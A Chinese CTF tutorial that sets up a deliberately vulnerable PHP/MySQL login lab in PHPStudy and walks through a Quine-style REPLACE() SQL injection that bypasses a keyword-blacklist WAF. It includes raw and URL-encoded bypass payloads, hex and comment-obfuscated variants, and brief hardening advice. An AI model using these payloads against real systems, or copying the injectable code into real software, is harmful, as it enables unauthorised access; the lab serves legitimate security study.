当前位置: 首页 > article >正文

保姆级教程:在PHPStudy环境下复现CTFHub MySQL注入题(附WAF绕过Payload分析)

从零构建MySQL注入实验环境PHPStudy靶场搭建与Quine攻击实战第一次接触SQL注入时我盯着屏幕上那个看似简单的登录框完全无法理解黑客是如何通过几个特殊字符就能突破系统防线的。直到亲手搭建环境、逐行调试代码后才真正明白那些教科书上的攻击手法究竟如何落地。本文将带你用最轻量的方式复现一个经典CTF题目不用云服务器、不依赖复杂工具只需一台普通Windows电脑和PHPStudy套件。1. 实验环境快速部署1.1 PHPStudy极简安装访问PHPStudy官网下载V8.1版本约50MB安装过程只需三步解压后运行phpstudy_x.x.x.exe选择安装路径建议D盘根目录勾选创建桌面快捷方式安装完成后启动控制面板点击启动按钮激活Apache和MySQL服务。常见问题排查端口冲突若80端口被占用修改Apache配置文件的Listen 80为其他端口服务启动失败尝试以管理员身份运行# 验证MySQL服务状态在PHPStudy安装目录下 ./MySQL/bin/mysqladmin -u root -p status1.2 靶场源码部署在PHPStudy的WWW目录新建ctfhub_sqli文件夹创建以下三个文件index.php前端登录页!DOCTYPE html html head titleMySQL注入实验/title /head body form actionlogin.php methodPOST input typetext nameusername placeholderUsername input typepassword namepassword placeholderPassword button typesubmitLogin/button /form a href?source1查看源码/a /body /htmllogin.php后端验证逻辑?php $FLAG CTFHub{THIS_IS_YOUR_FLAG}; function checkSql($input) { $blacklist [regexp,between,in,flag,,,,and,|, right,left,reverse,update,extractvalue,floor, substr,,;,$,0x,sleep, ]; foreach($blacklist as $word) { if(stripos($input, $word) ! false) { die(检测到危险字符: .htmlspecialchars($word)); } } } // 数据库连接 $con mysqli_connect(localhost,root,root); mysqli_select_db($con, ctfhub); mysqli_query($con, CREATE TABLE IF NOT EXISTS users(username varchar(20), password varchar(50))); // 登录验证 if(isset($_POST[username]) isset($_POST[password])) { $username $_POST[username]; $password $_POST[password]; if($username ! admin) die(仅允许admin登录); checkSql($password); $sql SELECT password FROM users WHERE usernameadmin AND password$password; $result mysqli_query($con, $sql); $row mysqli_fetch_assoc($result); if($row $row[password] $password) { die(登录成功! Flag: .$FLAG); } else { die(密码错误); } } if(isset($_GET[source])) { highlight_file(__FILE__); } ?lib.php辅助函数?php function alertMes($msg, $url) { die(scriptalert($msg);location.href$url;/script); } ?关键配置注意MySQL密码默认为root若修改过需同步调整login.php中的连接参数2. 注入原理深度解析2.1 代码审计关键点通过审计login.php我们发现三个致命漏洞硬编码凭证强制要求用户名为adminif($username ! admin) die(仅允许admin登录);WAF缺陷checkSql函数存在绕过可能// 用stripos逐个检查黑名单词未处理编码混淆 foreach($blacklist as $word) { if(stripos($input, $word) ! false) { die(检测到危险字符: .htmlspecialchars($word)); } }逻辑漏洞密码比对方式可被利用if($row $row[password] $password) { die(登录成功! Flag: .$FLAG); }2.2 攻击面分析常规注入手法在此场景全部失效攻击类型失效原因布尔盲注需要用到、、等被禁字符时间盲注sleep函数被过滤报错注入extractvalue等函数被禁止联合查询需要空格和union后的select突破口利用MySQL的REPLACE函数构造Quine自产生程序使查询结果与输入完全相同。3. Quine攻击实战演练3.1 REPLACE函数特性先通过基础示例理解函数行为-- 将字符串中的a替换为b SELECT REPLACE(abcdea, a, b); -- 输出: bbcdeb -- 多层嵌套替换 SELECT REPLACE(REPLACE(a.b.c, ., -), a, A); -- 执行顺序 -- 1. 内层REPLACEa-b-c -- 2. 外层REPLACEA-b-c3.2 自指构造技巧要实现$row[password] $password需构造特殊Payload使得数据库查询结果 用户输入内容分步构建方案基础Quine模板REPLACE(REPLACE(REPLACE(REPLACE(.,CHAR(34),CHAR(39)),CHAR(46),.), CHAR(34), CHAR(39)), CHAR(46), REPLACE(REPLACE(.,CHAR(34),CHAR(39)),CHAR(46),.))绕过WAF的最终Payload1/**/union/**/select/**/replace(replace(1/**/union/**/select/**/replace(replace(.,char(34),char(39)),char(46),.)#,char(34),char(39)),char(46),1/**/union/**/select/**/replace(replace(.,char(34),char(39)),char(46),.)#)#URL编码后的攻击字符串usernameadminpassword1%2f**%2funion%2f**%2fselect%2f**%2freplace(replace(1%2f**%2funion%2f**%2fselect%2f**%2freplace(replace(.,char(34),char(39)),char(46),.)%23,char(34),char(39)),char(46),1%2f**%2funion%2f**%2fselect%2f**%2freplace(replace(.,char(34),char(39)),char(46),.)%23)%233.3 分步调试过程在PHPStudy的MySQL命令行中逐步测试-- 步骤1验证基础替换逻辑 SELECT REPLACE(., CHAR(34), CHAR(39)); -- 输出: . -- 步骤2构建自指结构 SELECT REPLACE( REPLACE(REPLACE(.,CHAR(34),CHAR(39)), CHAR(34), CHAR(39)), CHAR(46), REPLACE(.,CHAR(34),CHAR(39)) ); -- 步骤3添加联合查询框架 SELECT password FROM users WHERE usernameadmin AND password1 UNION SELECT REPLACE(REPLACE(...,...),...,...);4. 防御方案与进阶思考4.1 安全加固建议漏洞点修复方案代码示例密码比对逻辑先查询再独立验证if(password_verify($input, $row[hash]))WAF实现使用正则完整匹配preg_match(/\b(union错误提示统一模糊消息die(认证失败)4.2 Quine攻击的变体探索十六进制编码版SELECT REPLACE(REPLACE(0x272e27,CHAR(34),CHAR(39)),CHAR(46),0x272e27)注释混淆版SELECT/*!50000REPLACE*/(REPLACE(./*注释*/,CHAR(34),CHAR(39)),CHAR(46),.)多函数组合版SELECT CONCAT(REPLACE(REPLACE(.,CHAR(34),CHAR(39)),CHAR(46), REPLACE(REPLACE(.,CHAR(34),CHAR(39)),CHAR(34),CHAR(39))), --)在真实渗透测试中曾遇到过一个CMS系统因为类似漏洞导致后台沦陷。攻击者通过精心构造的评论内容利用数据库的字符串处理特性最终获取了管理员会话。这让我深刻意识到即使是最基础的字符串操作函数在特定上下文组合中也可能成为系统突破口。

相关文章:

保姆级教程:在PHPStudy环境下复现CTFHub MySQL注入题(附WAF绕过Payload分析)

从零构建MySQL注入实验环境:PHPStudy靶场搭建与Quine攻击实战 第一次接触SQL注入时,我盯着屏幕上那个看似简单的登录框,完全无法理解黑客是如何通过几个特殊字符就能突破系统防线的。直到亲手搭建环境、逐行调试代码后,才真正明白…...

别只盯着树莓派!聊聊GEC6818这块国产ARM板在嵌入式学习中的独特优势与避坑指南

国产ARM开发板GEC6818实战指南:从硬件解析到智能家居项目落地 在嵌入式开发领域,树莓派几乎成了入门者的默认选择,但这款英国产的单板计算机真的适合所有学习场景吗?当我第一次接触到GEC6818这块国产ARM开发板时,它的8…...

别再复制粘贴了!深入理解STM32中IIR滤波器的差分方程与状态变量

从零构建STM32 IIR滤波器:差分方程、状态变量与C语言实现全解析 在嵌入式信号处理领域,IIR(无限脉冲响应)滤波器因其高效的计算特性和优异的频率选择性能,成为STM32等资源受限平台的理想选择。但许多开发者仅仅停留在&…...

Kook Zimage真实幻想Turbo企业级应用:SpringBoot微服务架构实战

Kook Zimage真实幻想Turbo企业级应用:SpringBoot微服务架构实战 1. 微服务架构下的AI图像生成价值 在内容创作平台的后台重构过程中,我们将Kook Zimage真实幻想Turbo的AI图像生成能力独立封装为微服务,这种架构设计带来了显著优势&#xff…...

Leather Dress Collection 快速上手:10分钟完成Vue3前端项目集成

Leather Dress Collection 快速上手:10分钟完成Vue3前端项目集成 你是不是刚拿到一个部署好的AI模型接口,想把它快速集成到你的Vue3项目里,看看效果?或者你正在开发一个需要AI能力的应用,但对接后端API、处理流式响应…...

FlowState Lab 在音频信号处理中的迁移应用效果:音高与节奏分析

FlowState Lab 在音频信号处理中的迁移应用效果:音高与节奏分析 1. 音频分析的新视角 音乐和语音信号处理一直是人工智能领域的重要研究方向。传统的音频分析方法往往需要复杂的特征工程和领域专业知识,而FlowState Lab的出现为这一领域带来了全新的可…...

比迪丽AI绘画效果展示:系列风格化角色设计作品集

比迪丽AI绘画效果展示:系列风格化角色设计作品集 用AI画出你心中的角色,让创意不再受技术限制 最近试用了比迪丽AI绘画模型,专门做了系列风格化角色设计的测试。不得不说,效果真的让人眼前一亮——从奇幻冒险的精灵战士到科幻未来…...

FLAC转ALAC踩坑实录:除了音质无损,你的专辑封面和元数据都保留了吗?

FLAC转ALAC终极指南:如何无损迁移音质、元数据与专辑封面 每次打开Apple Music看到那些没有封面的专辑,或是艺术家信息显示为"未知"的曲目,总让人有种说不出的别扭。作为一位十年资深的数字音乐收藏者,我深知真正的音乐…...

别再死记硬背了!用MONAI Transform处理医学图像,这5个实战场景帮你一次搞懂

医学图像处理实战:5个MONAI Transform核心场景解析 医学影像AI开发中最令人头疼的环节,往往不是模型设计,而是数据预处理。我曾见过不少团队花费80%的时间在数据清洗和转换上,却依然难以构建标准化的处理流程。MONAI Transform的出…...

Linux文件传输利器SCP命令使用详解与实战技巧

在Linux系统管理和运维中,文件传输是日常高频操作之一。无论是本地与远程服务器之间的数据同步,还是跨服务器直接传输文件,scp(Secure Copy Protocol)都是最常用的工具之一。它基于SSH协议,提供加密传输能力…...

MiniCPM-o-4.5-nvidia-FlagOS企业级方案:高可用服务器集群部署指南

MiniCPM-o-4.5-nvidia-FlagOS企业级方案:高可用服务器集群部署指南 1. 引言:当AI应用走向规模化 想象一下这个场景:你的团队基于MiniCPM-o-4.5-nvidia-FlagOS开发了一款智能客服应用,上线初期反响不错。但随着用户量激增&#x…...

Linux中的more 和 less区别对比分析

在 Linux/Unix 系统中,more 和 less 都是用于分页查看文本文件的命令,但 less 是 more 的增强版,功能更强大。以下是它们的核心区别和用法对比:1. 基础功能对比特性moreless(更强大)向前翻页❌ 仅支持向下翻…...

SDMatte与CI/CD集成:实现模型服务的自动化部署与更新

SDMatte与CI/CD集成:实现模型服务的自动化部署与更新 1. 引言:当AI模型遇上DevOps 最近遇到一个挺有意思的场景:某设计团队在使用SDMatte进行图像背景去除时,每次模型更新都需要手动重新部署服务,导致新功能上线延迟…...

LongCat动物百变秀效果展示:橘猫变布偶、柯基穿毛衣,AI编辑惊艳案例

LongCat动物百变秀效果展示:橘猫变布偶、柯基穿毛衣,AI编辑惊艳案例 1. 开篇:当AI成为宠物造型师 想象一下这样的场景:你拍了一张自家橘猫的照片,突然想看看它变成高贵布偶猫的样子;或者给柯基犬穿上毛衣…...

调试直流电机位置环PID时,我踩过的那些坑和解决思路

直流电机位置环PID调试实战:从振荡到精准控制的进阶指南 调试直流电机的位置环PID控制器就像在钢丝上跳舞——稍有不慎就会陷入振荡、超调或响应迟缓的困境。作为一名经历过无数次深夜调试的工程师,我想分享那些让我抓狂的问题和最终找到的解决方案。这不…...

GeoServer零配置入门:如何用绿色版快速搭建本地地图服务器(含端口自定义技巧)

GeoServer零配置入门:如何用绿色版快速搭建本地地图服务器(含端口自定义技巧) 在GIS开发领域,快速搭建本地测试环境是每个开发者必备的技能。GeoServer作为开源地图服务器中的佼佼者,其绿色版更是提供了即解压即用的便…...

OpenClaw安全审计方案:Phi-3-mini-128k-instruct操作日志分析

OpenClaw安全审计方案:Phi-3-mini-128k-instruct操作日志分析 1. 为什么需要OpenClaw安全审计 去年夏天,我在用OpenClaw自动处理一批财务报表时,差点酿成大错。当时脚本在凌晨3点自动运行,由于模型错误理解了"删除临时文件…...

SQL Server导入导出向导报错终极指南:从驱动安装到版本兼容性全解析

SQL Server数据迁移全链路排错手册:从驱动配置到跨版本适配实战 当你第5次看到"未在本地计算机上注册Microsoft.ACE.OLEDB.12.0提供程序"的红色报错框时,是否想过这背后隐藏着SQL Server数据迁移的完整知识体系?数据工程师老张最近…...

微信小程序对接实战:快速开发集成通义千问1.5-1.8B模型的AI聊天应用

微信小程序对接实战:快速开发集成通义千问1.5-1.8B模型的AI聊天应用 你是不是也想过,给自己的微信小程序加上一个智能聊天助手?比如,做一个能解答用户问题的客服机器人,或者一个能陪你闲聊、帮你写文案的创意伙伴。听…...

用面包板和三极管DIY四比特加法器:从逻辑门到级联的完整实战记录

从零构建四比特加法器:面包板上的数字逻辑之旅 1. 硬件DIY的魅力与数字逻辑基础 在电子工程和计算机科学的世界里,理解数字逻辑电路的工作原理是一项基础而关键的技能。而亲手用面包板和三极管搭建一个四比特加法器,不仅能让你深入理解计算机…...

OpenClaw学术场景应用:Qwen3-32B镜像辅助论文数据处理

OpenClaw学术场景应用:Qwen3-32B镜像辅助论文数据处理 1. 为什么需要自动化论文数据处理? 作为一名经常需要处理实验数据的研究人员,我过去常常花费大量时间在Excel和Python之间来回切换。数据清洗、格式转换、异常值检测这些重复性工作不仅…...

nuScenes 3D标注数据深度解析:从Box字段到可视化,理解自动驾驶感知的基石

nuScenes 3D标注数据深度解析:从Box字段到可视化,理解自动驾驶感知的基石 自动驾驶技术的快速发展离不开高质量数据集的支撑,而nuScenes作为业界公认的标杆级数据集,其丰富的3D标注信息为感知算法研发提供了坚实基础。本文将带您深…...

SN75453与非门电路设计:如何正确选择上下拉电阻值(附计算公式)

SN75453与非门电路设计:如何正确选择上下拉电阻值(附计算公式) 在数字电路设计中,与非门是最基础的逻辑门之一,而SN75453作为一款经典的TTL与非门芯片,广泛应用于各种控制系统中。但很多工程师在实际应用时…...

DeOldify跨框架模型转换:从PyTorch到ONNX及TensorRT加速

DeOldify跨框架模型转换:从PyTorch到ONNX及TensorRT加速 最近在折腾一个挺有意思的项目,想把老照片上色的模型DeOldify部署到生产环境里。原版模型是用PyTorch写的,直接拿来用的话,推理速度总觉得差点意思,尤其是在处…...

零售AI开发者必看:Ostrakon-VL-8B终端从部署到任务执行完整指南

零售AI开发者必看:Ostrakon-VL-8B终端从部署到任务执行完整指南 1. 项目概览:像素特工终端 Ostrakon-VL-8B是一款专为零售与餐饮场景优化的多模态大模型,我们将其封装成了一个充满游戏趣味的Web交互终端。与传统工业级UI不同,这…...

别再写“超级循环“了!裸机系统跑得快的秘密,全在架构上

裸机开发这件事,门槛低,天花板高。随便写个while(1)主循环,里面堆上一堆if判断,程序确实能跑起来。但跑起来和跑得好,完全是两码事。很多工程师写了三五年裸机代码,项目越来越大,代码越来越乱&a…...

YOLOE镜像从入门到精通:环境激活、代码预测、训练微调全流程

YOLOE镜像从入门到精通:环境激活、代码预测、训练微调全流程 1. 镜像环境准备与快速启动 1.1 环境配置检查 YOLOE官方镜像已经预装了所有必要的依赖项和工具链,确保开发者可以立即开始工作而无需担心环境配置问题。以下是关键环境信息: 项…...

EasyAnimateV5-7b-zh-InP模型在微信小程序中的应用:短视频生成功能实现

EasyAnimateV5-7b-zh-InP模型在微信小程序中的应用:短视频生成功能实现 1. 为什么要在微信小程序里集成视频生成能力 最近帮几个做社交内容的小团队做技术咨询,发现一个特别有意思的现象:用户发朋友圈、发群聊、发公众号时,对短…...

使用CSDN博客记录FRCRN部署全过程:技术分享与经验沉淀

使用CSDN博客记录FRCRN部署全过程:技术分享与经验沉淀 今天想和大家聊聊一个特别有意思的实践方式:一边在星图GPU平台上部署FRCRN这个语音降噪模型,一边把整个过程写成一篇CSDN技术博客。这听起来是不是有点“左右互搏”?但相信我…...

TurboDiffusion实战案例:如何让静态产品图“动”起来做广告

TurboDiffusion实战案例:如何让静态产品图“动”起来做广告 1. 为什么广告行业需要动态产品图? 在数字营销时代,静态图片的吸引力正在迅速下降。数据显示,带有动态效果的广告素材点击率比静态图片高出300%以上。但传统视频制作面…...